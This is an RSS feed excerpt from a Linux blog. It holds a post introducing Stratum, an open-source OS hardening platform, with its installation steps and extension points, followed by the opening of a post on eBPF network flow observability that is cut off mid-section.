					<comments>https://linuxcent.com/stratum-os-hardening-platform/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sun, 31 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[OS Image Builder]]></category>
		<category><![CDATA[DevSecOps]]></category>
		<category><![CDATA[Infrastructure as Code]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[OS Hardening]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Stratum]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1834</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 5</span> <span class="rt-label rt-postfix">minutes</span></span>Stratum — open-core (Apache 2.0) OS hardening platform: declare baselines in YAML, build across six clouds, and gate CI/CD deployments on compliance grade.</p>
<p>The post <a href="https://linuxcent.com/stratum-os-hardening-platform/">Stratum — OS Hardening as a Platform</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 5</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>OS Hardening as Code, Episode 6</em><br />
<em><a href="https://linuxcent.com/cloud-ami-security-risks-custom-os-images/">Cloud AMI Security Risks</a> · <a href="/linux-hardening-as-code-yaml-blueprint/">Linux Hardening as Code</a> · <a href="/linux-hardening-multi-cloud/">Multi-Cloud OS Hardening</a> · <a href="/automated-openscap-compliance-cis/">Automated OpenSCAP Compliance</a> · <a href="/cicd-compliance-gate-hardened-images/">CI/CD Compliance Gate</a> · </em><em>Stratum Platform</em>**</p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Stratum is open-source under Apache 2.0 — the engine, blueprint format, scanner, and Pipeline API are all available on GitHub</li>
<li>The platform follows the same open-core model as Terraform/OpenTofu and Cilium/Isovalent: OSS core, self-hostable, extendable</li>
<li>Three extension points: custom compliance controls, provider plugins (add new cloud providers), pipeline integrations</li>
<li>Architecture: Blueprint YAML → Engine → Provider Layer → Ansible-Lockdown → OpenSCAP → Golden Image → Pipeline API</li>
<li>The series taught the user-facing interface for five episodes; EP06 covers what&#8217;s underneath and how to build on it</li>
<li>Installation is a single <code class="" data-line="">helm install</code> or <code class="" data-line="">docker compose up</code> — the platform runs in your environment</li>
</ul>
<hr />
<h2 id="the-series-arc-inverted">The Series Arc, Inverted</h2>
<p>EP01 showed that default cloud AMIs arrive pre-broken. By the time you reach EP06, that problem has a complete solution:</p>
<pre><code class="" data-line="">EP01 — The problem:
  Default AMI → Production → Security audit finds gaps
  (unknown OS baseline, unverified hardening, no evidence)

EP06 — The solution:
  HardeningBlueprint YAML
           ↓
    stratum build          ← EP02 (blueprint as code)
    --provider aws,gcp     ← EP03 (multi-cloud)
           ↓
    OpenSCAP scan          ← EP04 (compliance grading)
    Grade: A (94/100)
           ↓
    POST /api/pipeline/scan ← EP05 (CI/CD gate)
    Result: pass
           ↓
    Production deployment
    (Grade A, SARIF attached, blueprint version-controlled)
</code></pre>
<p>For five episodes, you&#8217;ve used Stratum as a user. This episode covers what it looks like to run it yourself, extend it, and build on it.</p>
<hr />
<p>I&#8217;ve spent years watching infrastructure teams solve the same OS hardening problem in slightly different ways. Custom scripts that drift. OpenSCAP runs that produce evidence no one reads. Compliance checklists completed by humans who have competing priorities.</p>
<p>The tools exist. <code class="" data-line="">ansible-lockdown</code> applies CIS controls reliably. OpenSCAP verifies them accurately. The CI/CD systems can enforce anything you can express as a pass/fail. The gap isn&#8217;t the tooling — it&#8217;s the integration layer that ties them together into a reproducible, auditable pipeline.</p>
<p>Stratum is that integration layer, open-sourced.</p>
<p>The philosophy is the same as Terraform applied to OS security posture: declare the desired state in a version-controlled file, apply it reproducibly, and verify it automatically. The skip-at-2am problem disappears not because engineers are more careful, but because there&#8217;s no step to skip.</p>
<hr />
<h2 id="the-architecture">The Architecture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────┐
│                 HardeningBlueprint YAML                  │
│         (version-controlled, provider-agnostic)          │
└─────────────────────┬───────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────────────────┐
│                   Stratum Engine                         │
│                  (Apache 2.0, OSS)                       │
│  ┌─────────────┐  ┌──────────────┐  ┌────────────────┐  │
│  │  Blueprint  │  │   Provider   │  │    Scheduler   │  │
│  │   Parser    │  │    Layer     │  │  (parallel     │  │
│  │             │  │  AWS  GCP    │  │   multi-cloud  │  │
│  │  Validates  │  │  Azure DO    │  │   builds)      │  │
│  │  schema +   │  │  Linode      │  │                │  │
│  │  overrides  │  │  Proxmox     │  │                │  │
│  └─────────────┘  └──────────────┘  └────────────────┘  │
└─────────────────────┬───────────────────────────────────┘
                      │
           ┌──────────┴──────────┐
           ▼                     ▼
  ┌─────────────────┐   ┌─────────────────┐
  │ Ansible-Lockdown │   │  OpenSCAP       │
  │  Runner          │   │  Scanner        │
  │                  │   │                 │
  │  UBUNTU22-CIS    │   │  A-F grade      │
  │  RHEL8-STIG      │   │  SARIF export   │
  │  Custom roles    │   │  Drift detect   │
  └────────┬─────────┘   └────────┬────────┘
           │                      │
           └──────────┬───────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Golden Image          │
         │   (AMI / GCP / Azure)   │
         │   + compliance metadata │
         └────────────┬────────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Pipeline API          │
         │   (Apache 2.0, OSS)     │
         │                         │
         │  POST /api/pipeline/scan │
         │  ← CI/CD gate           │
         └─────────────────────────┘
</code></pre>
<p>Every component is open-source under Apache 2.0. The engine, provider layer, Ansible runner, OpenSCAP scanner, and Pipeline API are all in the repository. Nothing is locked to a hosted service.</p>
<hr />
<h2 id="installation">Installation</h2>
<p>Stratum runs as a set of containers. Kubernetes or Docker Compose both work.</p>
<p><strong>Kubernetes (Helm):</strong></p>
<pre><code class="" data-line=""># Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Install Stratum in your cluster using the bundled Helm chart
helm install stratum ./deploy/helm/stratum \
  --namespace stratum-system \
  --create-namespace \
  --set config.providers.aws.enabled=true \
  --set config.providers.gcp.enabled=true \
  --set config.storageClass=standard

# Verify
kubectl get pods -n stratum-system
# NAME                          READY   STATUS    RESTARTS   AGE
# stratum-engine-0              1/1     Running   0          2m
# stratum-scanner-7d9b4-abc12   1/1     Running   0          2m
# stratum-api-6c8f5-def34       1/1     Running   0          2m
</code></pre>
<p><strong>Docker Compose (single-node):</strong></p>
<pre><code class="" data-line=""># Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Configure providers
cp config/providers.example.yaml config/providers.yaml
vim config/providers.yaml  # add AWS/GCP/Azure credentials

# Start
docker compose up -d

# Stratum is available at http://localhost:8080
</code></pre>
<hr />
<h2 id="the-three-extension-points">The Three Extension Points</h2>
<h3 id="1-custom-compliance-controls">1. Custom Compliance Controls</h3>
<p>Add controls that aren&#8217;t in the CIS benchmark — internal policies, org-specific security requirements, or controls from other frameworks:</p>
<pre><code class="" data-line=""># controls/custom-audit-policy.yaml
id: CUSTOM-001
title: Audit logging retention must be 90 days
description: All instances must retain audit logs for 90 days minimum
severity: high
benchmark: custom
check:
  type: command
  command: &quot;grep -E &#039;^max_log_file_action&#039; /etc/audit/auditd.conf&quot;
  expected: &quot;max_log_file_action = keep_logs&quot;
remediation:
  type: ansible
  task: |
    - name: Configure audit log retention
      lineinfile:
        path: /etc/audit/auditd.conf
        regexp: &#039;^max_log_file_action&#039;
        line: &#039;max_log_file_action = keep_logs&#039;
</code></pre>
<p>Deploy the custom control:</p>
<pre><code class="" data-line="">stratum controls deploy --file controls/custom-audit-policy.yaml
</code></pre>
<p>Reference it in any blueprint:</p>
<pre><code class="" data-line="">compliance:
  benchmark: cis-l1
  controls: all
  additional_controls:
    - CUSTOM-001
</code></pre>
<p>Custom controls appear in the grade calculation and SARIF output alongside CIS controls.</p>
<h3 id="2-provider-plugins">2. Provider Plugins</h3>
<p>Add support for a new cloud provider by implementing the provider interface:</p>
<pre><code class="" data-line=""># providers/custom_provider.py
from stratum.providers import BaseProvider

class CustomProvider(BaseProvider):
    name = &quot;my-cloud&quot;

    def provision_build_instance(self, blueprint, config):
        # Launch a build instance on your cloud
        # Return: instance_id, connection_details
        ...

    def create_image(self, instance_id, blueprint, grade):
        # Snapshot the instance into an image
        # Tag with compliance metadata
        # Return: image_id
        ...

    def terminate_instance(self, instance_id):
        # Clean up the build instance
        ...
</code></pre>
<p>Register the plugin:</p>
<pre><code class="" data-line="">stratum providers register --file providers/custom_provider.py --name my-cloud
</code></pre>
<p>The provider is now available as <code class="" data-line="">--provider my-cloud</code> in all <code class="" data-line="">stratum build</code> commands.</p>
<h3 id="3-pipeline-integrations">3. Pipeline Integrations</h3>
<p>Beyond the curl-based API, Stratum provides a webhook system that fires on build completion, scan results, and gate failures:</p>
<pre><code class="" data-line=""># Webhook configuration
notifications:
  - event: pipeline_gate_failure
    webhook: https://hooks.slack.com/...
    template: |
      Image {{ image_id }} failed compliance gate.
      Grade: {{ grade }} (required: {{ min_grade }})
      Top failing controls:
      {% for control in failing_controls[:3] %}
      - {{ control.id }}: {{ control.title }}
      {% endfor %}

  - event: build_complete
    webhook: https://jira.yourdomain.com/api/...
    template: |
      New image built: {{ image_id }}
      Blueprint: {{ blueprint_name }}@{{ blueprint_version }}
      Grade: {{ grade }}
</code></pre>
<hr />
<h2 id="the-open-core-model">The Open-Core Model</h2>
<p>Stratum follows the same model as the tools that have become infrastructure standards:</p>
<table>
<thead>
<tr>
<th>Tool</th>
<th>Open-core model</th>
</tr>
</thead>
<tbody>
<tr>
<td>Terraform / OpenTofu</td>
<td>Core OSS, enterprise features in paid tier</td>
</tr>
<tr>
<td>Cilium / Isovalent</td>
<td>Core OSS, enterprise support/features in paid tier</td>
</tr>
<tr>
<td>Vault / HCP Vault</td>
<td>Core OSS, hosted/enterprise in paid tier</td>
</tr>
<tr>
<td><strong>Stratum</strong></td>
<td>Engine + blueprint + scanner + Pipeline API: Apache 2.0</td>
</tr>
</tbody>
</table>
<p>Everything taught in this series — the blueprint format, the build pipeline, the compliance grading, the CI/CD gate — is in the OSS core. You can self-host it, extend it, contribute to it, and run it in your own infrastructure without any dependency on a hosted service.</p>
<p>The repository is at: <strong>github.com/rrskris/Stratum</strong></p>
<hr />
<h2 id="what-this-series-taught">What This Series Taught</h2>
<p>EP01 — EP06 in one view:</p>
<table>
<thead>
<tr>
<th>Episode</th>
<th>What you learned</th>
<th>What Stratum does</th>
</tr>
</thead>
<tbody>
<tr>
<td>EP01</td>
<td>Default AMIs are insecure by design</td>
<td>Replaces default AMI with a hardened golden image</td>
</tr>
<tr>
<td>EP02</td>
<td>Blueprint as code — the 2am skip disappears</td>
<td>HardeningBlueprint YAML — 5-step wizard or direct YAML</td>
</tr>
<tr>
<td>EP03</td>
<td>One blueprint, six providers, no drift</td>
<td>6 providers: AWS, GCP, Azure, DigitalOcean, Linode, Proxmox</td>
</tr>
<tr>
<td>EP04</td>
<td>Automated OpenSCAP — grade at build time</td>
<td>Compliance Scanner: A-F, SARIF, drift detection</td>
</tr>
<tr>
<td>EP05</td>
<td>CI/CD gate — the unhardened image never deploys</td>
<td>Pipeline API: <code class="" data-line="">POST /api/pipeline/scan</code></td>
</tr>
<tr>
<td>EP06</td>
<td>The platform — OSS, self-hostable, extendable</td>
<td>Apache 2.0, Helm install, three extension points</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>This series closes the OS hardening gap. The same principle — declare desired state, build reproducibly, verify automatically — applies to every layer of your infrastructure.</p>
<p>If you&#8217;ve been following the <a href="/ebpf-from-kernel-to-cloud/">eBPF: From Kernel to Cloud series</a>, EP10 covers what happens when you combine kernel-level observability with the hardened base that Stratum provides: every connection, every process spawn, every file access — visible from the host kernel, on an OS baseline you can verify.</p>
<p>The next series: <strong>Purple Team Playbook</strong> — real attack paths against cloud and Kubernetes infrastructure, how they&#8217;re detected, and how they&#8217;re closed. Starting May 8.</p>
<p>GitHub: <a href="https://github.com/rrskris/Stratum">github.com/rrskris/Stratum</a></p>
<p>Get the Purple Team series in your inbox → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&amp;linkname=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fstratum-os-hardening-platform%2F&#038;title=Stratum%20%E2%80%94%20OS%20Hardening%20as%20a%20Platform" data-a2a-url="https://linuxcent.com/stratum-os-hardening-platform/" data-a2a-title="Stratum — OS Hardening as a Platform"></a></p><p>The post <a href="https://linuxcent.com/stratum-os-hardening-platform/">Stratum — OS Hardening as a Platform</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/stratum-os-hardening-platform/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1834</post-id>	</item>
		<item>
		<title>Network Flow Observability — What Every Connection Reveals</title>
		<link>https://linuxcent.com/ebpf-network-flow-observability/</link>
					<comments>https://linuxcent.com/ebpf-network-flow-observability/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Fri, 29 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[Cilium]]></category>
		<category><![CDATA[Flow Telemetry]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network Observability]]></category>
		<category><![CDATA[SRE]]></category>
		<category><![CDATA[TC eBPF]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1838</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 10</span> <span class="rt-label rt-postfix">minutes</span></span>See every TCP connection, retransmit, and dropped packet across your cluster using eBPF TC hooks — the kernel-level flow telemetry that APM tools interpret, not originate.</p>
<p>The post <a href="https://linuxcent.com/ebpf-network-flow-observability/">Network Flow Observability — What Every Connection Reveals</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 10</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 10</em><br />
<a href="/what-is-ebpf/">What Is eBPF?</a> · <a href="/ebpf-verifier-safety/">The BPF Verifier</a> · <a href="/ebpf-vs-kernel-modules/">eBPF vs Kernel Modules</a> · <a href="/ebpf-program-types/">eBPF Program Types</a> · <a href="/ebpf-maps-persistent-data/">eBPF Maps</a> · <a href="/co-re-libbpf-write-once/">CO-RE and libbpf</a> · <a href="/xdp-network-fast-path/">XDP</a> · <a href="/tc-ebpf-pod-network-policy/">TC eBPF</a> · <a href="/bpftrace-kernel-observability/">bpftrace</a> · <strong>Network Flow Observability</strong> · <a href="/dns-kernel-observability/">DNS Observability</a></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img decoding="async" width="605" height="2560" src="https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-scaled.png" alt="eBPF Network Flow Observability — Hubble and Cilium architecture for zero-instrumentation flow monitoring" class="wp-image-2119" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-scaled.png 605w, https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-71x300.png 71w, https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-242x1024.png 242w, https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-768x3249.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-363x1536.png 363w, https://linuxcent.com/wp-content/uploads/2026/05/ep10-network-flow-og-2-484x2048.png 484w" sizes="(max-width: 605px) 100vw, 605px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">Hubble captures every packet decision at the eBPF layer — no sidecar, no app changes, no sampling.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Network flow observability with eBPF attaches persistent programs to TC hooks and records every connection attempt, retransmit, reset, and drop — continuously, with no sampling<br />
  <em>(TC hook = Traffic Control hook: the point in the Linux network stack where eBPF programs intercept packets after ingress or before egress, tied to a specific network interface)</em></li>
<li>APM tools and service mesh telemetry are interpretations of what happened; kernel-level flow data from TC hooks is the raw event stream they all derive from</li>
<li>Retransmit counters at the kernel level reveal congestion, half-open connections, and remote endpoint failures that application logs never surface</li>
<li>Cilium&#8217;s Hubble and similar tools (Pixie, Retina) are eBPF flow exporters — they run TC programs, collect <code class="" data-line="">perf_event</code> or <code class="" data-line="">ringbuf</code> events, and expose them over an API</li>
<li>You can verify what flow data a tool is actually collecting with four <code class="" data-line="">bpftool</code> commands — without reading documentation</li>
<li>Production caution: flow maps grow with the number of active connections; pin and bound your maps, and account for the per-packet overhead on high-throughput interfaces</li>
</ul>
<hr />
<p>EP09 showed bpftrace as an on-demand kernel query tool — compile a question, get an answer, clean up. Network flow observability with eBPF is the persistent version: programs that stay attached to TC hooks across your entire fleet, recording every connection without waiting for you to ask. When a client reports intermittent failures that appear nowhere in application logs, that persistent record is what you query. This episode covers how that layer works and how to read it.</p>
<h2 id="quick-check-what-flow-data-is-your-cluster-already-collecting">Quick Check: What Flow Data Is Your Cluster Already Collecting?</h2>
<p>Before building anything new, check what&#8217;s already running. If you have Cilium, Pixie, or Retina on your cluster, eBPF flow programs are already attached:</p>
<pre><code class="" data-line=""># SSH into a worker node, then:

# What TC programs are attached to cluster interfaces?
bpftool net list

# Expected output on a Cilium node:
# xdp:
#
# tc:
# eth0(2) clsact/ingress prog_id 38 prio 1 handle 0x1 direct-action
# eth0(2) clsact/egress  prog_id 39 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/ingress prog_id 41 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/egress  prog_id 42 prio 1 handle 0x1 direct-action
</code></pre>
<pre><code class="" data-line=""># What maps are those programs holding state in?
bpftool map list | grep -E &quot;flow|conn|sock|nat&quot;

# Sample output:
# 24: hash  name cilium_ct4_global  flags 0x0
#     key 24B  value 56B  max_entries 65536  memlock 4718592B
# 25: hash  name cilium_ct4_local   flags 0x0
#     key 24B  value 56B  max_entries 8192   memlock 589824B
</code></pre>
<p>Each <code class="" data-line="">lxcXXXX</code> interface is a pod&#8217;s veth pair. The TC programs on those interfaces are what Cilium uses to enforce NetworkPolicy and collect flow telemetry. If you see <code class="" data-line="">prog_id</code> values on pod interfaces, your cluster is already doing kernel-level flow collection.</p>
<blockquote>
<p><strong>Not running Cilium?</strong> On a plain kubeadm or EKS node without a CNI that uses eBPF, <code class="" data-line="">bpftool net list</code> will show no TC programs on pod interfaces — just whatever kube-proxy or the CNI plugin installed. You can still attach your own flow programs with <code class="" data-line="">tc qdisc add dev eth0 clsact</code> — that&#8217;s the starting point this episode covers.</p>
</blockquote>
<hr />
<p>The client opened a ticket on a Tuesday afternoon. &#8220;Intermittent connection failures to the payment gateway. Started around 11 AM. Application logs say timeout. Retry logic is masking it for most users but the error rate is up 0.3%.&#8221;</p>
<p>I looked at the APM dashboard. The service showed elevated latency — p99 at 850ms versus a normal 120ms — but no hard errors at the application layer. The service mesh metrics showed the downstream call succeeding from the mesh&#8217;s perspective. The payment gateway team said their side looked clean.</p>
<p>Three tools. Three different answers. All of them interpreting the network. None of them were the network.</p>
<p>I ran:</p>
<pre><code class="" data-line="">bpftool map dump id 24 | grep -A5 &quot;payment-gateway-ip&quot;
</code></pre>
<p>The connection tracking map showed retransmit count 14 for a specific <code class="" data-line="">(src_ip, dst_ip, src_port, dst_port)</code> tuple — the same 5-tuple, every 30 seconds, for 2 hours. The kernel was retransmitting. The TCP stack was compensating. The application was seeing sporadic success because retransmits eventually got through. The APM dashboard averaged that latency into a p99 and called it &#8220;elevated.&#8221;</p>
<p>The kernel had the truth. Everything above it was rounding.</p>
<hr />
<h2 id="why-application-level-metrics-miss-what-the-kernel-sees">Why Application-Level Metrics Miss What the Kernel Sees</h2>
<p>Application metrics — APM spans, service mesh telemetry, load balancer health checks — operate at Layer 7. They measure round-trip time for complete requests, error codes returned, bytes transferred. They answer &#8220;did this request succeed?&#8221; not &#8220;what did the network do to make it succeed?&#8221;</p>
